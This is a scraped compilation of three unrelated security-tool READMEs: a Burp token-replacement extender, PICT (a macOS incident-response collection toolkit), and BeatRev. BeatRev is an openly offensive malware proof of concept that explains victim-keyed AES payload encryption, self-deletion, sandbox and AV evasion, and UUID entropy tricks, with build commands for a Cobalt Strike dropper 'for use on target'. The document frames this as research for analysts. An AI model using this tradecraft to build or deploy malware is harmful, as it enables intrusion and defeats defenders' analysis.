    • Send the request http://HOST:PORT/api/v1/exams/MQ==/ by passing the Authorization Bearer token (get it from the above step)
  2. Add the ATOR jar file as a extender in BURP
  3. Right click on the request (/handle-user-token) in Proxy history and send it to the Authentication Token Obtain and Replace extender
  4. Add a new entry in the Extraction configuration by selecting the "access_token" value and give the name as "token" (it may be any name). Note: For this application, one request is enough to generate a token. A token can also be generated after multiple requests
  5. TRIGGER CONDITION:
    • Macro steps will get executed if the condition is matched.
    • After execution of steps, replace the incoming request by taking values from "Pattern" and "Replacement Area" if specified.
    • For our testing,
      • Error condition is 401(Status Code)
      • Pattern is "Authorization: Bearer \w*" (Specify the regex Pattern how you want to replace with extraction values)
      • Replacement Area is "Authorization: Bearer <NAME which you gave in STEP 4>"
    • Click on "Add" Button.
  6. For this example, one replacement is enough to make the incoming request valid, but you can add multiple replacements for a single condition.
  7. Hit the invalid request from Repeater and check the req/res flows in either FLOW/Logger++
    • An invalid Bearer token (http://HOST:PORT/api/v1/exams/MQ==/) from Repeater makes the response a 401.
    • The extender will match this condition, start running the recorded steps, and extract the "access_token"
    • It replaces the access token (from step ii) in the actual request (from Repeater) and makes this invalid request valid.
    • In the Repeater console, you see a 200 OK response.
  8. Do Step 7 again and check the flow
    • This time the extender will not invoke the steps because the existing token is valid, so it uses that.

Built With

  • SWING - Used to add panel

Contributing

Please read CONTRIBUTING.md for details on our code of conduct, and the process for submitting pull requests to us.

Versioning

v1.0

Authors

Authors from Synopsys - Ashwath Reddy (@ka3hk) and Manikandan Rajappan (@rmanikdn)

License

This software is released by Synopsys under the MIT license.

Acknowledgments

  • https://github.com/FrUh/ExtendedMacro ExtendedMacro was a great start - we have modified the UI to handle more complex scenarios. We have also fixed bugs and improved speed by replacing tokens in memory.

Demo Video

ATOR v2.0.0:

The UI panel was split into 4 different configuration sections. Check out the code from v2 or use the executable from v2/bin.

  1. Error Condition - Find the error condition req/res and add a trigger condition [can be status code / text in body content / text in header]. Multiple conditions can also be added.
  2. Obtain Token: Find all the req/res needed to get the token. It can be a single request or multiple requests (do the replacement accordingly)
  3. Error Condition Replacement: Mark the trigger condition and also mark the place in the request where the replacement needs to take place (map the extraction)
  4. Preview: Dry run it before configuring it for a scan.


BeatRev - POC For Frustrating/Defeating Malware Analysts


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim it AES encrypts the actual payload (an RDLL) using environmental data from that victim. Each subsequent time the malware is run it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt or the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I converted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower the entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream (ADS) of Stage1. In order to achieve the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was run it would read the ADS, decrypt it, write it back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations, and the CreateProcess call of course wasn't great.

I happened to come upon Stephen Fewer's research concerning Reflective DLLs and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted at runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version 1 and is a welcome change.

Stage1 did not have any real kind of AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API hashing to remove functions from the Import Address Table of Stage1. This has helped with detection, and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that it is already keyed to the original box it was run on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES encrypted binary blob gives an executable, I looked into integrating shellcode stored as UUIDs. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique, the entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).
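As a rough illustration of the idea (not the project's actual code), 16-byte chunks of a binary blob can be rendered as UUID strings, which UuidFromStringA can later parse back into memory:

import uuid

def to_uuid_strings(data: bytes):
    # Pad to a multiple of 16 bytes, then render each 16-byte chunk as a UUID string.
    data += b"\x90" * (-len(data) % 16)
    # bytes_le mirrors the mixed-endian field layout a Windows UUID struct (and UuidFromStringA) uses.
    return [str(uuid.UUID(bytes_le=data[i:i+16])) for i in range(0, len(data), 16)]

print(to_uuid_strings(b"\xfc\x48\x83\xe4\xf0"))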

Finally, it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was built around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MinGW but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process, I wrote my Stage2 RDLL to contain a global variable chunk of memory that is the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.

Once compiled, this Stage2 stub is transferred to kali where a binary patch may be performed to stick the real CS shellcode into the place in memory where it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target, in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is carried out by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is not available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size as does Stage1 in order to hold it. A stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M, and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXE's. However with a little more work in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

About 6 months ago it occurred to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time concerned with trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
  2. When you are talking about legal, sanctioned Red Team work there isn't really a need to try and frustrate or defeat a reverse engineer because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, on the first time of being ran, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it for a match in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample had been transfered to a malware analysts sandbox), the malware deletes itself (Once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given as to what values a Blue Teamer could easily spoof; a MAC address for example may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually in order for a Reverse Engineer to match their sandbox to the original victim. Ideally the values chosen and enumerated will be one that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been ran previously and then go gather the hostname and amount of RAM again in order to produce the hashed number. This would then be evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine as it originally did), it executes as expected however if a different value is returned it will again call the self-delete function in order to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()), and seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months but each time was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again and while still neither of those factors have really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; Without prior knowledge of this technique the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retrieved from the Registry, and because this value can be manually modified, it presents an easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered, this can become easier or more difficult.

Stage1

Stage1 was dropped by Stage0 and exists in the exact same location as Stage0 did (including the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence mechanism subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Performs sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes the combined value and pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks the first two bytes of the decrypted Stage2 buffer; if they are not MZ (unsuccessful decryption), deletes Stage1/Stage2 and exits.
  7. Writes the decrypted Stage2 back to disk as an ADS of Stage1.
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), deletes Stage1/Stage2 and exits.
  9. Sleeps 5 seconds to allow Stage2 to execute and exit so it can be overwritten.
  10. Encrypts Stage2 using the victim-specific AES Key/IV.
  11. Writes the encrypted Stage2 back to disk as an ADS of Stage1.

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADS's, as the self-deletion technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points at which Stage1 could detect that it is not being run on the original victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a good first check. The second protection point is the result of the CreateProcess call: if it fails because Stage2 was not properly decrypted, the malware is similarly deleted. The result of this call could also be modified by the reverse engineer to prevent deletion, however this doesn't change the fact that Stage2 is encrypted and inaccessible.
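A hedged sketch of that first gate, reusing the assumed derive_key_iv() from the earlier sketch: read Stage2 from the ADS, decrypt it with the environment-derived Key/IV, and check for the MZ header, burning the chain on a mismatch. The library, mode, and stream name remain assumptions:

import os
import sys
from Crypto.Cipher import AES   # pycryptodome; library and CBC mode are assumptions

def stage1_gate(stage1_path: str, key: bytes, iv: bytes) -> bytes:
    with open(stage1_path + ":stage2", "rb") as ads:   # hypothetical stream name
        blob = ads.read()
    plain = AES.new(key, AES.MODE_CBC, iv).decrypt(blob)
    if plain[:2] != b"MZ":
        # Wrong environment: decryption produced garbage, so remove the chain.
        # (Stand-in for the self-delete trick; os.remove cannot delete a running EXE.)
        os.remove(stage1_path)
        sys.exit(1)
    return plain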

Stage2

Stage2 is the meat and potatoes of the malware chain; it is a fully fledged shellcode runner/piece of malware in its own right. By encrypting and protecting it in the way that we have, the actions of the end-state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing Cobalt Strike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transferring the malware after initial infection will strip and lose Stage2, because it is an ADS of Stage1. Special care would have to be taken to transfer the sample in a way that preserves Stage2, as without it a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADS's, and tools like 7-Zip and PeaZip can extract files along with their ADS's.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by Stage0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again, I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamer burns through a few copies of it because it keeps deleting itself) and the information that Stage1 gathers from the target system should be able to be identified. Given a well-orchestrated response, the Blue Team should be able to identify the victim the malware came from, gather that information from it, and feed it into the program so that it can be transformed into the AES Key/IV that decrypts Stage2. There are a lot of "ifs" in there, however, related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 might be side-loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test malware against AWL, nor have I bothered porting this all to DLL format, so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping it to disk and calling CreateProcess; either manually mapping the executable or using a tool like Donut to turn it into shellcode seems like a reasonable idea.

Code and binary

During development I created a Builder application that Stage1 and Stage2 can be fed to in order to produce a functional Stage0; this will not be provided, however I will provide most of the source code for Stage1, as it is the piece that would be most visible to a Blue Teamer. Stage0 is left as an exercise for the reader, and Stage2 is whatever standalone executable you want to run and protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute; you must run Dropper64.exe (now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look, but keep in mind that in an incident response scenario, 99% of the time you will be getting Stage1/Stage2; Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced and more complete if I had experience with a debugger and disassembler, but you do the best with what you have. I am eager to hear from Blue Teamers and other malware devs what they think. I am sure I have over-complicatedly re-invented the wheel here given what actual APTs are doing, but I learned a few things along the way. Thank you for reading!



Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.

Data will be collected in two forms. The first is summary files, containing the output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second is complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required and passes in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:
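(The example below is illustrative; the module and class names, such as browser/BrowserCollector and the entry under unused, are placeholders for whatever Collector modules you actually use.)

{
    "collection_dest": "~/pict_output/",
    "all_users": true,
    "collectors": {
        "browser": "BrowserCollector"
    },
    "unused": {
        "example": "ExampleCollector"
    },
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": true
        }
    }
}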

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
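Putting the above together, a minimal custom module might look something like the following sketch. The base-class method signatures here are assumed from the descriptions above rather than copied from the real template.py:

# collectors/example.py - illustrative custom module (signatures assumed)
import os
from collectors.collector import Collector

class ExampleCollector(Collector):
    def __init__(self, collectionPath, allUsers):
        # Let the Collector base class set up its properties first
        super().__init__(collectionPath, allUsers)
        self.verbose = False

    def printStartInfo(self):
        print("Collecting example data...")

    def applySettings(self, settingsDict):
        # Handle module-specific settings, then pass them on to the super
        self.verbose = settingsDict.get("verbose", False)
        super().applySettings(settingsDict)

    def collect(self):
        # Write a summary file inside the collection folder
        summaryPath = os.path.join(self.collectionPath, "example_summary.txt")
        with open(summaryPath, "w") as f:
            f.write("example summary data\n")

        # Let the Collector class copy this artifact and preserve its metadata
        self.pathsToCollect.append("/etc/hosts")

        # Give the Collector class the chance to handle its responsibilities
        super().collect()

The module would then be enabled by adding an entry such as "example": "ExampleCollector" to the collectors dictionary in the configuration JSON.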

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



โŒ